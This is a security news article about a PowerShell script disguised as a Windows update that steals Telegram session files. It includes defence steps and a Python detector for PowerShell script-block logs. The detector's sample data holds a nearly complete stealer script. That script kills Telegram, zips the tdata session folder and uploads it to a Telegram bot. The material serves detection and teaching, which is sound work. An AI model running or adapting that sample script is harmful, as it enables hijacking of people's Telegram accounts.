Malware - Hackers Steal Telegram Sessions via PowerShell Script

A new PowerShell script on Pastebin is designed to steal Telegram session data. Users are at high risk if they execute this disguised malware. Immediate action is advised to secure accounts.

Category: Malware & Ransomware · Severity: HIGH

Original Reporting

Cyber Security News · Tushar Subhra Dutta

AI Summary

CyberPings AI · Reviewed by Rohit Rana

🎯 In short: a PowerShell script posing as a Windows update copies your Telegram session files and sends them to the attacker, who can then use your account without a login code.

What Happened

Cybersecurity researchers have uncovered a malicious PowerShell script hosted on Pastebin, designed to steal Telegram session data from both desktop and web clients. Disguised as a routine Windows system update titled "Windows Telemetry Update," the script relies on users running it as they would any other update.

How It Works

Once the script is run, it begins by collecting host metadata, including the victim's username, computer name, and public IP address. It then targets specific directories under %APPDATA% for Telegram Desktop, archiving session files into a compressed file named "diag.zip". This file is temporarily stored in the user's TEMP folder before being sent to the attacker's Telegram bot via the Telegram Bot API.

The script was identified as a high-severity threat during continuous monitoring of Pastebin for malicious content. Analysts noted that it operates without obfuscation or persistence mechanisms, indicating it may still be in a testing phase rather than fully deployed.

Who's Being Targeted

The primary targets are users of Telegram Desktop and Telegram Web. The script abuses the trust users place in routine updates: a file presented as a system update attracts little scrutiny, so it needs no software vulnerability, only a user willing to run it.

Signs of Infection

If the script executes on a system, users may notice unusual behavior, such as unexpected notifications from their Telegram account or unauthorized messages being sent. The script also terminates the running Telegram process before copying the session files, so a Telegram client that closes on its own shortly after a supposed "update" is run is itself a warning sign, though one easily overlooked. A file named "diag.zip" in the user's TEMP folder is another artifact to look for.

How to Protect Yourself

To safeguard against this threat:

If you ran the script

  1. Terminate all other active Telegram sessions through the app settings (Settings > Devices). The stolen session files let the attacker log in as you without a login code, and this step is what invalidates them.
  2. Set or change your two-step verification (cloud) password and keep two-factor authentication enabled. Telegram has no primary password; the two-step verification password is the one an attacker with a copied session could otherwise change or remove.
  3. Review your account for any unauthorized activity, including messages sent, chats joined and devices listed.

Network and monitoring controls

  4. Block domains like api.telegram.org and web.telegram.org at the network level if Telegram is not permitted in your environment. Where Telegram is permitted this does not help: the exfiltration goes over TLS to Telegram's own API domain and blends in with legitimate traffic.
  5. Monitor for unusual API calls from scripting environments such as PowerShell, for example PowerShell processes opening connections to api.telegram.org, or script-block logs (Event ID 4104) that reference the Telegram Bot API, the Telegram Desktop data directory, or a zip written to TEMP.
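As an added example, not code from the original report or from CyberPings: a small Python detector that applies the behaviour described under "How It Works" and the monitoring advice in step 5 to PowerShell script-block log text (the content of Event ID 4104 records). The indicator patterns and weights, the public-IP lookup services, and the two sample script blocks are this example's own assumptions and constructions; the Telegram Desktop session path (%APPDATA%\Telegram Desktop\tdata) is the client's documented location, and the bot token in the sample is a placeholder.

```python
"""Score PowerShell script-block text for the Telegram-session-theft
behaviour described above. Constructed example: the indicator regexes,
weights and sample blocks are assumptions, not signatures from the report."""
from __future__ import annotations

import re
from dataclasses import dataclass, field

# (name, pattern, weight). Weights are this example's own judgement:
# touching the Telegram Desktop session store or the Bot API is strong,
# generic host recon or zipping into TEMP is weak on its own.
INDICATORS = [
    ("host_recon",      re.compile(r"\$env:(USERNAME|COMPUTERNAME)", re.I), 1),
    # Assumed public-IP lookup services; the report names none.
    ("public_ip",       re.compile(r"api\.ipify\.org|icanhazip\.com|ifconfig\.me", re.I), 1),
    ("kill_telegram",   re.compile(r"Stop-Process\b.*-Name\s+['\"]?telegram", re.I), 2),
    # Telegram Desktop keeps session data under %APPDATA%\Telegram Desktop\tdata.
    ("tdata_path",      re.compile(r"telegram desktop\\tdata", re.I), 3),
    ("archive_to_temp", re.compile(r"Compress-Archive\b.*\$env:TEMP", re.I), 1),
    ("bot_api",         re.compile(r"api\.telegram\.org/bot\d+:[A-Za-z0-9_-]+", re.I), 3),
    ("send_document",   re.compile(r"/sendDocument\b", re.I), 2),
]
BOT_TOKEN_RE = re.compile(r"api\.telegram\.org/bot(\d+:[A-Za-z0-9_-]+)", re.I)


@dataclass
class Verdict:
    hits: list[str] = field(default_factory=list)
    score: int = 0
    bot_tokens: list[str] = field(default_factory=list)

    @property
    def level(self) -> str:
        # Thresholds chosen for this example.
        if self.score >= 6:
            return "high"
        if self.score >= 3:
            return "medium"
        return "low"


def analyze(script_text: str) -> Verdict:
    """Return which indicators fire in one script block and the summed weight."""
    v = Verdict()
    for name, pattern, weight in INDICATORS:
        if pattern.search(script_text):
            v.hits.append(name)
            v.score += weight
    # The bot token identifies the attacker's bot; worth pulling out for IR.
    v.bot_tokens = BOT_TOKEN_RE.findall(script_text)
    return v


def scan(blocks: dict[str, str]) -> dict[str, Verdict]:
    """Analyze a mapping of block identifier -> script text."""
    return {ident: analyze(text) for ident, text in blocks.items()}


# Constructed sample script blocks (what Event ID 4104 would carry).
# The first mirrors the behaviour the article describes; the token is fake.
SAMPLE_SCRIPT_BLOCKS = {
    "suspect": r'''
# Windows Telemetry Update
$user = $env:USERNAME; $pc = $env:COMPUTERNAME
$ip = Invoke-RestMethod -Uri "https://api.ipify.org"
Stop-Process -Name "Telegram" -Force -ErrorAction SilentlyContinue
Compress-Archive -Path "$env:APPDATA\Telegram Desktop\tdata" -DestinationPath "$env:TEMP\diag.zip" -Force
Invoke-RestMethod -Uri "https://api.telegram.org/bot000000000:PLACEHOLDER_TOKEN/sendDocument" -Method Post -Form @{ chat_id = "0"; document = Get-Item "$env:TEMP\diag.zip" }
''',
    # Routine admin task: also zips into TEMP and reads $env:USERNAME,
    # which is why those indicators carry low weight on their own.
    "benign_backup": r'''
Compress-Archive -Path "$env:LOCALAPPDATA\MyApp\logs" -DestinationPath "$env:TEMP\logs.zip" -Force
Write-Host "Log backup by $env:USERNAME on $env:COMPUTERNAME"
''',
}

if __name__ == "__main__":
    for ident, verdict in scan(SAMPLE_SCRIPT_BLOCKS).items():
        print(f"{ident}: {verdict.level} (score {verdict.score}) "
              f"hits={verdict.hits} tokens={verdict.bot_tokens}")
```

Run it as a script to see the constructed "suspect" block score high while the routine backup script stays low; in practice you would feed it the ScriptBlockText field of 4104 events. The weighting matters: archiving into TEMP or reading $env:USERNAME is normal administration, while the tdata path and a Bot API URL with an embedded token almost never appear in legitimate scripts, and the extracted token is the one artifact you can hand to Telegram or use to pivot to other samples from the same operator.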

Conclusion

This incident highlights the ongoing risks associated with malware disguised as legitimate software updates. Users must remain vigilant and take proactive measures to protect their data from such threats.

🔒 Pro Insight

The lack of obfuscation suggests this malware is still in validation, but its functionality indicates potential for future widespread attacks.
